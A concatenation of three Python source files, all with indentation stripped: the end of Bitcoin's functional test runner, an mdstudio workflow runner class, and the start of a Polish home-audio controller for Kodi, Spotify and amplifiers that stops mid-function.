os.rmdir(tmpdir)
all_passed = all(map(
lambda test_result: test_result.was_successful, test_results)) and coverage_passed
sys.exit(not all_passed)
def execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast=False):
update_queue = Queue()
job_queue = Queue()
failfast_event = threading.Event()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
if failfast:
logging.debug("Early exiting after test failure")
failfast_event.set()
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(
", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
job_runner represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
resultCollector = threading.Thread(target=handle_update_messages)
resultCollector.daemon = True
resultCollector.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.daemon = True
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, failfast_event, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION", "ORIG. ORDER") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print(
"\n".join(
deque(
combined_logs.splitlines(),
combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated)\n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} | {}\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), (str(self.time) + " s").ljust(8), self.num + 1) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def check_script_prefixes(all_scripts):
"""Check that no more than `EXPECTED_VIOLATION_COUNT` of the
test scripts don't start with one of the allowed name prefixes."""
EXPECTED_VIOLATION_COUNT = 27
# LEEWAY is provided as a transition measure, so that pull-requests
# that introduce new tests that don't conform with the naming
# convention don't immediately cause the tests to fail.
LEEWAY = 10
good_prefixes_re = re.compile(
"(example|feature|interface|mempool|mining|p2p|rpc|wallet)_")
bad_script_names = [
script for script in all_scripts if good_prefixes_re.match(script) is None]
if len(bad_script_names) < EXPECTED_VIOLATION_COUNT:
print(
"{}HURRAY!{} Number of functional tests violating naming convention reduced!".format(
BOLD[1],
BOLD[0]))
print("Consider reducing EXPECTED_VIOLATION_COUNT from {} to {}".format(
EXPECTED_VIOLATION_COUNT, len(bad_script_names)))
elif len(bad_script_names) > EXPECTED_VIOLATION_COUNT:
print(
"INFO: {} tests not meeting naming conventions (expected {}):".format(len(bad_script_names), EXPECTED_VIOLATION_COUNT))
print(" {}".format("\n ".join(sorted(bad_script_names))))
assert len(bad_script_names) <= EXPECTED_VIOLATION_COUNT + \
LEEWAY, "Too many tests not following naming convention! ({} found, expected: <= {})".format(
len(bad_script_names), EXPECTED_VIOLATION_COUNT)
def get_tests_to_run(test_list, test_params, cutoff, startfrom, src_timings):
"""
Returns only test that will not run longer that cutoff.
Returns only tests that will run at least startfrom.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the
# list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = []
for t in tests_with_params:
runtime = get_test_time(t)
if runtime < cutoff and runtime >= startfrom:
result.append(t)
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
return False
else:
print("All RPC commands covered.")
return True
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time, test_suite_name):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "{}".format(test_suite_name),
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped", {"message": "skipped"}).text = "skipped"
elif test_result.status == "Failed":
fail_result = test_result.stderr or test_result.stdout or "<no output>"
ET.SubElement(e_test_case, "failure", {"message": "failure"}).text = fail_result
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
|
workflow_runner.py
|
# -*- coding: utf-8 -*-
import os
import threading
import random
from mdstudio_workflow import __twisted_logger__
from mdstudio_workflow.workflow_common import WorkflowError, validate_workflow
from mdstudio_workflow.workflow_spec import WorkflowSpec
if __twisted_logger__:
from twisted.logger import Logger
logging = Logger()
else:
import logging
class WorkflowRunner(WorkflowSpec):
"""
This is the main class for running microservice oriented workflows.
Running a workflow is based on a workflow specification build using the
`WorkflowSpec` class. Such a workflow can be loaded into the `Workflow`
class simply by overloading the Workflow.workflow attribute.
The `Workflow` class also inherits the methods from the `WorkflowSpec`
class allowing to build specification right from the `Workflow` class
and even change a running workflow.
The execution of workflow steps is performed on a different thread than
the main Workflow object allowing the user to interact with the running
workflow.
The DAG including the metadata dat is generated while executing the steps
can be serialized to JSON for persistent storage. The same JSON object is
used as input to the Workflow class validated by a Workflow JSON schema.
:param workflow: the workflow DAG to run
:type workflow: JSON object
"""
def __init__(self, workflow=None, **kwargs):
# Init inherit classes such as the WorkflowSpec
super(WorkflowRunner, self).__init__(workflow=workflow, **kwargs)
# Define task runner
self.task_runner = None
self.workflow_thread = None
# Workflow state
self.project_metadata = None
self._is_running = False
def process_check_run(self, task, output):
"""
Process Future object and register an new task status check for the future.
:param task: task to check
:type task: :graphit:Graph
:param output: Future object
:type output: :py:dict
"""
if not task.task_metadata.external_task_id():
task.task_metadata.external_task_id.set(task.data.value_tag, output.get('task_id'))
if 'query_url' in output:
task.query_url.set(task.data.value_tag, output['query_url'])
delta_t = output.get('delta_t', 600)
timer = threading.Timer(delta_t, task.check_task, (self.output_callback,), {'task_runner':self.task_runner})
timer.deamon = True
timer.start()
logging.info('Task {0} ({1}): {2} check {3} next after {4} sec.'.format(task.status, task.nid, task.key,
task.task_metadata.checks(), delta_t))
def output_callback(self, output, tid, update=True):
"""
Process the output of a task and stage the next task(s) to run.
A successful task is expected to return some output. If None it
is considered to have failed by the workflow manager.
:param output: output of the task
:type output: :py:dict
:param tid: task ID
:type tid: :py:int
"""
# Get and update the task
task = self.get_task(tid)
status, output = task.update(output)
# Update project metadata
if update:
self.project_metadata.update_time.set()
# Save results as part of workflow to file
if self.project_metadata.project_dir():
self.save(os.path.join(self.project_metadata.project_dir(), 'workflow.jgf'))
# Process Future object
if output.get('object_type') == 'FutureObject' and status == 'running':
self.process_check_run(task, output)
return
# Switch workdir if needed
if self.project_metadata.project_dir.get():
os.chdir(self.project_metadata.project_dir.get())
# If the task is completed, go to next
next_task_nids = []
if status == 'completed':
# Get next task(s) to run
next_tasks = task.next_tasks()
next_task_nids.extend([ntask.nid for ntask in next_tasks])
logging.info('{0} new tasks to run with output of {1} ({2}): {3}'.format(len(next_task_nids), task.nid,
task.key, ','.join([nt.key for nt in next_tasks])))
# If the task failed, retry if allowed and reset status to "ready"
if status == 'failed' and task.task_metadata.retry_count():
task.task_metadata.retry_count.value -= 1
task.status = 'ready'
logging.warn('Task {0} ({1}) failed. Retry ({2} times left)'.format(task.nid, task.key,
task.task_metadata.retry_count()))
next_task_nids.append(task.nid)
# If the active failed an no retry is allowed, save workflow and stop.
if task.status == 'failed' and task.task_metadata.retry_count() == 0:
logging.error('Task {0} ({1}) failed'.format(task.nid, task.key))
self.is_running = False
return
# If the task is completed but a breakpoint is defined, wait for the
# breakpoint to be lifted
if task.task_metadata.breakpoint():
logging.info('Task {0} ({1}) finished but breakpoint is active'.format(task.nid, task.key))
self.is_running = False
return
# No more new tasks
if not next_task_nids:
# Not finished but no active tasks anymore/breakpoint
if not self.active_tasks and not self.is_completed:
breakpoints = self.active_breakpoints
if breakpoints:
logging.info('Active breakpoint: {0}'.format(', '.join([t.key for t in breakpoints])))
self.is_running = False
return
# Finish of if there are no more tasks to run and all are completed
if self.is_completed or self.has_failed:
logging.info('finished workflow')
if not self.project_metadata.finish_time():
self.project_metadata.finish_time.set()
self.is_running = False
return
# Launch new tasks
for tid in next_task_nids:
self.run_task(tid)
def run_task(self, tid):
"""
Run a task by task ID (tid)
Handles the setup procedure for running a task using a dedicated Task
runner. The output or errors of a task are handled by the
`output_callback` method.
Tasks to run are processed using the following rules:
* If the task is currently active, stop and have the output callback
function deal with it.
* If the task has status 'ready' run it.
* In all other cases, pass the task data to the output callback
function. This is useful for hopping over finished tasks when
relaunching a workflow for instance.
:param tid: Task node identifier
:type tid: :py:int
"""
task = self.get_task(tid)
# Do not continue if the task is active
if task.is_active:
logging.debug('Task {0} ({1}) already active'.format(task.nid, task.key))
return
# Only continue if all connected tasks are done
unfinished_prev_tasks = [t for t in task.previous_tasks() if t.status != 'completed']
if unfinished_prev_tasks:
logging.info('Task {0} ({1}): output of tasks {2} not available'.format(task.nid, task.key,
', '.join([str(t.nid) for t in unfinished_prev_tasks])))
# In cases if previous failed tasks, try unset is_running
for unfinished in unfinished_prev_tasks:
if unfinished.status == 'failed':
self.is_running = False
break
return
# Run the task if status is 'ready'
if task.status == 'ready':
logging.info('Task {0} ({1}), status: preparing'.format(task.nid, task.key))
# Confirm again that the workflow is running
self.is_running = True
self.project_metadata.update_time.set()
# Perform run preparations and run the task
if task.prepare_run():
task.status = 'running'
if task.task_type == 'WampTask':
wait = random.randint(5,10)
logging.info('Task {0} ({1}): start task in {2} sec.'.format(task.nid, task.key, wait))
threading.Timer(wait, task.run_task, (self.output_callback,),
{'task_runner': self.task_runner}).start()
else:
task.run_task(self.output_callback, task_runner=self.task_runner)
else:
logging.error('Task preparation failed')
self.output_callback(None, task.nid)
# In all other cases, pass None and have the task output update
# method decide what to do next.
else:
logging.info('Task {0} ({1}), status: {2}'.format(task.nid, task.key, task.status))
self.output_callback(None, tid, update=False)
@property
def is_running(self):
"""
Returns the global state of the workflow as running or not.
:rtype: :py:bool
"""
return self._is_running
@is_running.setter
def is_running(self, state):
"""
Set the global state of the workflow as running or not.
If the new state is 'False' first check if there are no other parallel
active tasks.
:rtype: :py:bool
"""
if not state:
state = len(self.active_tasks) >= 1
self._is_running = state
@property
def is_completed(self):
"""
Is the workflow completed successfully or not
:rtype: :py:bool
"""
return all([task.status in ('completed', 'disabled') for task in self.get_tasks()])
@property
def has_failed(self):
"""
Did the workflow finish unsuccessfully?
True if there are no more active tasks and at least one task has failed
or was aborted
:rtype: :py:bool
"""
if not len(self.active_tasks) and any([task.status in ('failed', 'aborted') for task in self.get_tasks()]):
return True
return False
@property
def starttime(self):
"""
Return the time stamp at which the workflow was last started
:rtype: :py:int
"""
return self.project_metadata.start_time.timestamp()
@property
def updatetime(self):
"""
Return the time stamp at which the workflow was last updated
:rtype: :py:int
"""
return self.project_metadata.update_time.timestamp()
@property
def finishtime(self):
"""
Return the time stamp at which the workflow finished or None
if it has not yet finished
:rtype: :py:int
"""
if not self.is_running:
return self.project_metadata.finish_time.timestamp()
return None
@property
def runtime(self):
"""
Return the total workflow runtime in seconds as the different between
the start time and the finish time or last update time
:rtype: :py:int
"""
start = self.starttime or 0
end = self.finishtime or self.updatetime
# No update and finish time means the workflow was not started yet
if not end:
return 0
return end - start
@property
def active_tasks(self):
"""
Return all active tasks in the workflow
:rtype: :py:list
"""
return [task for task in self.get_tasks() if task.is_active]
@property
def failed_tasks(self):
"""
Return failed tasks in the workflow
:rtype: :py:list
"""
return [task for task in self.get_tasks() if task.status == 'failed']
@property
def active_breakpoints(self):
"""
Return tasks with active breakpoint in the workflow
:rtype: :py:list
"""
return [task for task in self.get_tasks() if task.task_metadata.breakpoint.get(default=False)]
def cancel(self):
"""
Cancel the full workflow.
This method will send a cancel request to all active tasks in the
running workflow. Once there are no more active tasks the workflow
run method will stop and the deamon thread will be closed.
For canceling specific tasks please use the `cancel` function of the
specific task retrieved using the `WorkflowSpec.get_task` method or
workflow graph methods.
"""
if not self.is_running:
logging.info('Unable to cancel workflow that is not running.')
return
# Get active task
active_tasks = self.active_tasks
logging.info('Cancel tasks: {0}'.format(', '.join([t.key for t in active_tasks])))
for task in active_tasks:
task.cancel()
self.project_metadata.update_time.set()
self.is_running = False
def get_task(self, tid=None, key=None):
"""
Return a task by task ID (graph nid) or task name (key).
:param tid: nid of task to return
:type tid: :py:int
:param key: task name
:type key: :py:str
:return: task object
:rtype: :graphit:Graph
"""
if tid:
task = self.workflow.getnodes(tid)
elif key:
task = self.workflow.query_nodes(key=key)
else:
raise WorkflowError('Search on task ID (tid) or task name (key). None defined')
if task.empty():
raise WorkflowError('Task with tid {0} not in workflow'.format(tid))
if not task.get('format') == 'task':
raise WorkflowError('Node with tid {0} is no task object'.format(tid))
return task
def step_breakpoint(self, tid):
"""
Continue a workflow at a task that is paused by a breakpoint
:param tid: workflow task ID with active breakpoint
:type tid: :py:int
"""
task = self.get_task(tid)
if not task.task_metadata.breakpoint.get(default=False):
logging.warn('No active breakpoint set on task {0}'.format(task.key))
return
# Remove the breakpoint
task.task_metadata.breakpoint.set(task.data.value_tag, False)
logging.info('Remove breakpoint on task {0} ({1})'.format(tid, task.key))
def input(self, tid, **kwargs):
"""
Define task input and configuration data
:param tid: task ID to define input for
:type tid: :py:int
:param kwargs: keyword arguments to register as input
"""
task = self.get_task(tid)
task.set_input(**kwargs)
def output(self, tid=None):
"""
Get workflow output
Returns the output associated to all terminal tasks (leaf nodes) of
the workflow or of any intermediate tasks identified by the task ID
:param tid: task ID to return output for
:type tid: :py:int
:rtype: :py:dict
"""
task = self.get_task(tid)
output = {}
if task.status == 'completed':
output = task.get_output()
return output
def run(self, project_dir="./md_workflow", tid=None, validate=True):
"""
Run a workflow specification
Runs the workflow until finished, failed or a breakpoint is reached.
A workflow is a rooted Directed Acyclic Graph (DAG) that is started
from the root node. It can be started from any node relative to the
root as long as its parent(s) are successfully completed.
The workflow will be executed on a different thread allowing for
interactivity with the workflow instance while the workflow is
running.
By default, the workflow specification will be validated using the
`validate` method of the WorkflowSpec class.
:param tid: start the workflow from task ID
:type tid: :py:int
:param validate: Validate the workflow before running it
:type validate: :py:bool
:param project_dir: directory to store task output
:type project_dir: :py:str
"""
# Empty workflow, return
if self.workflow.empty() or not len(self.workflow.query_nodes(format='task')):
logging.info('Workflow contains no tasks')
return
# Start from workflow root by default
tid = tid or self.workflow.root
# Check if tid exists
if tid not in self.workflow.nodes:
raise WorkflowError('Task with tid {0} not in workflow'.format(tid))
# Validate workflow before running?
if validate:
if not validate_workflow(self.workflow):
raise WorkflowError('Workflow validation failed')
# If there are steps that store results locally (store_output == True)
# Create a project directory.
self.project_metadata = self.workflow.query_nodes(key='project_metadata')
if any(self.workflow.query_nodes(key="store_output").values()):
self.project_metadata.project_dir.set(self.workflow.data.value_tag,
self.project_metadata.project_dir.get(default=project_dir))
if self.project_metadata.project_dir.exists and self.is_completed:
raise WorkflowError('Directory for finished project exists: {0}'.format(
self.project_metadata.project_dir()))
self.project_metadata.project_dir.makedirs()
else:
self.project_metadata.project_dir.set(self.workflow.data.value_tag, None)
logging.info('Running workflow: {0}, start task ID: {1}'.format(self.project_metadata.title(), tid))
# Set is_running flag. Function as a thread-safe signal to indicate
# that the workflow is running.
if self.is_running:
logging.warning('Workflow {0} is already running'.format(self.project_metadata.title()))
return
self.is_running = True
# Set workflow start time if not defined. Don't rerun to allow
# continuation of unfinished workflow.
if not self.project_metadata.start_time():
self.project_metadata.start_time.set()
# Spawn a workflow thread
self.workflow_thread = threading.Thread(target=self.run_task, args=[tid])
self.workflow_thread.daemon = True
self.workflow_thread.start()
|
naglosnienie.py
|
import datetime
import time
import threading
import THutils
import wzmacniacze
import Kodi
import os
import logging
import liriki
import playlista
import radia
import ulubione
import spotify_odtwarzacz
import spotify_klasa
import constants
from copy import deepcopy
ADRES_KODI = 'http://127.0.0.1:8088/jsonrpc'
CZAS_ODSWIEZANIA_STANU_ODTWARZACZA = 1
LICZBA_ODSWIEZEN_DO_STATUSU = 8
CZAS_PRZERWY_MIEDZY_PROBAMI_ODTWARZANIA = 10 # w sekundach
CZAS_WYLACZENIA_PO_NIEAKTYWNOSCI = 10800 #3 godziny, podane w sekundach
# NAZWA_PLIKU_DZWONKA = constants.KATALOG_GLOWNY + '/doorbell.mp3'
# GLOSNOSC_PRZY_DZWONKU = 90
class BiezacyStan:
def __init__(self):
self.totaltime = 0
self.tytul = ''
self.currenttime = 0
self.pauza = True
self.interkom = False
self.nazwa_playlisty = ''
self.ts_playlisty = 0
self.ts_ulubionych = 0
self.ts_wzmacniaczy = 0
self.ts_radii = 0
self.ts_historii = 0
self.ts = 0
self.czy_gra_denon = False
self.czy_aktualnie_gra = False
self.aktualna_pozycja = playlista.PozycjaPlaylisty() # type: playlista.PozycjaPlaylisty
self.percentage = 0
self.ktorykolwiek_wlaczony = False
self.wzmacniacze = {}
self.link = ''
def biezacyStanDoTuple(self):
return {
constants.POLE_INTERKOM: self.interkom,
constants.POLE_CZY_AKTUALNIE_GRA: self.czy_aktualnie_gra,
constants.POLE_PAUZA: self.pauza,
constants.POLE_TIMESTAMP_PLAYLISTY: self.ts_playlisty,
constants.POLE_TIMESTAMP_ULUBIONYCH: self.ts_ulubionych,
constants.POLE_TIMESTAMP_WZMACNIACZY: self.ts_wzmacniaczy,
constants.POLE_TIMESTAMP_RADII: self.ts_radii,
constants.POLE_TIMESTAMP_HISTORII: self.ts_historii,
constants.POLE_TIMESTAMP_NAGLOSNIENIA: self.ts,
constants.POLE_AKTUALNA_POZYCJA: self.aktualna_pozycja.pozycja_do_listy(),
#TODO usunac pola link oraz tytul z biezacego stanu, sa w aktualnej pozycji
constants.POLE_TYTUL: self.tytul, constants.POLE_CZY_GRA_DENON: self.czy_gra_denon,
constants.POLE_TOTALTIME: self.totaltime, constants.POLE_CURRENTTIME: self.currenttime,
constants.POLE_PERCENTAGE: self.percentage,
constants.TS: self.ts}
def biezacy_stan_odpowiedzV2(self):
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_NAGLOSNIENIA,
self.biezacyStanDoTuple())
def wzmacniacze_stan_odpowiedzV2(self):
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_WZMACNIACZE,
self.wzmacniacze)
class Naglosnienie:
def __init__(self):
self.logger = logging.getLogger(constants.NAZWA_LOGGERA)
self.logger.info("Zaczynam inicjalizowac Naglosnienie.")
self.wzmacniacze = wzmacniacze.Wzmacniacze(self.logger)
self.odczytaj_konf()
# self.glosnosc_przy_dzwonku = GLOSNOSC_PRZY_DZWONKU
# self.czas_odczytu_konfiguracji = CZAS_ODCZYTU_KONFIGURACJI
#self.plik_dzwonka = ''
self.liryki = liriki.Liriki()
self.ic_trwa = False # czy interkom jest aktywny
self.IC_czy_gralo = False # jesli przed interkomem gralo to True
self.lock_aktualizacji_statusu = threading.Lock()
self.aktualna_playlista = playlista.Playlista(przy_starcie=True)
self.ulub = ulubione.Ulubione()
self.czas_ostatniego_polecenia_odtwarzania = datetime.datetime.now()
self.katalog_radii = radia.Radia()
self.katalog_radii.pobierz_radia_cyklicznie()
self.biezacy_stan = BiezacyStan()
self.licznik_delay_odswiezania = 0
self._czas_maksymalnego_braku_aktywnosci = CZAS_WYLACZENIA_PO_NIEAKTYWNOSCI
self.spoti = spotify_odtwarzacz.SpotifyOdtwarzacz(self.logger)
self.kodi = Kodi.Kodi(self.logger, ADRES_KODI)
self.odtwarzacz = self.kodi
self.pauza = True
self.czas_ostatniej_aktywnosci = datetime.datetime.now()
#self.notyfikacja_firebase = firebasenotification.Firebasenotification()
self.aktualizuj_status_odtwarzacza()
self.aktualizuj_cyklicznie_stan_odtwarzacza()
self.logger.info('Zakonczylem konstruktora klasy naglosnienie.')
def procesuj_polecenie(self, komenda, parametr1, parametr2):
if komenda == constants.RODZAJ_KOMUNIKATU_ULUBIONE:
return self.ulub.wyslij_ulubione()
elif komenda == constants.RODZAJ_KOMUNIKATU_KATALOG_RADII:
return self.katalog_radii.wyslij_katalog_radii()
elif komenda == constants.RODZAJ_KOMUNIKATU_PLAYLISTA:
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_PLAYLISTA,
self.aktualna_playlista.wyslij_playliste(pelna=False))
elif komenda == constants.RODZAJ_KOMUNIKATU_HISTORIA:
# TODO liczba linii historii do parametrow
poz = {constants.TS: self.biezacy_stan.ts_historii,
constants.POZYCJE: self.aktualna_playlista.odczytaj_historie()}
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_HISTORIA, poz)
elif komenda == constants.RODZAJ_KOMUNIKATU_STAN_WZMACNIACZE:
return THutils.skonstruuj_odpowiedzV2OK(constants.RODZAJ_KOMUNIKATU_STAN_WZMACNIACZE, self.wzmacniacze.do_listy())
elif komenda == 'ST':
if parametr1 == 'AR':
return self.zwroc_status_arduino(parametr2)
#TODO arduino przerobic na wz_toggle a nie wlacz wylacz
elif komenda == 'WZ_AR':
if parametr1 == constants.PARAMETR_JEDEN:
self.wlacz_wylacz_wzmacniacz_nazwa(parametr2, True)
else:
self.wlacz_wylacz_wzmacniacz_nazwa(parametr2, False)
self.kasuj_czas_ostatniej_aktywnosci()
return self.zwroc_status_arduino(parametr2)
elif komenda == 'UL_AR':
return self.ulub.arduino_wyslij_ulubione()
elif komenda == 'GL_AR':
if self.wzmacniacze.stan_wzmacniacza_po_nazwie(parametr2):
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_delta_nazwa(parametr2, int(parametr1))
self.przekaz_stan_wzmacniaczy_do_garazu()
return self.zwroc_status_arduino(parametr2)
elif komenda == 'GL': # wykorzystuje delte a nie bezwgledna wartosc glosnosci
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_delta_nazwa(parametr2, int(parametr1))
self.przekaz_stan_wzmacniaczy_do_garazu()
elif komenda == 'AR_TOGGLE':
self.kasuj_czas_ostatniej_aktywnosci()
self.toggle_wzmacniacz_nazwa(parametr2)
return self.zwroc_status_arduino(parametr2)
elif komenda == 'GLOSN':
try:
glosno = int(parametr1)
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_nazwa(parametr2, glosno)
self.przekaz_stan_wzmacniaczy_do_garazu()
except ValueError as serr:
self.logger.warning('Podano glosnosc nie jako liczbe: ' + str(parametr1) + ' dla wzmacniacza: ' +
parametr2 + ". Blad: " + str(serr))
elif komenda == 'GLOSN_DELTA':
self.kasuj_czas_ostatniej_aktywnosci()
self.wzmacniacze.set_glosnosc_delta_nazwa(parametr2, int(parametr1))
self.przekaz_stan_wzmacniaczy_do_garazu()
elif komenda == constants.KOMENDA_DZWONEK:
self.logger.info('Dzwonek do drzwi.')
if not self.ic_trwa:
threading.Thread(target=self.odtworz_z_pliku, args=(self.plik_dzwonka,)).start()
#thread.start_new_thread(self.odtworz_z_pliku, (self.plik_dzwonka,))
elif komenda == constants.RODZAJ_KOMUNIKATU_LIRYKI:
#self.liryki.odczytaj_liryki(self.aktualna_playlista.aktualna_pozycja().artist,
# self.aktualna_playlista.aktualna_pozycja().title)
#if lir is not None:
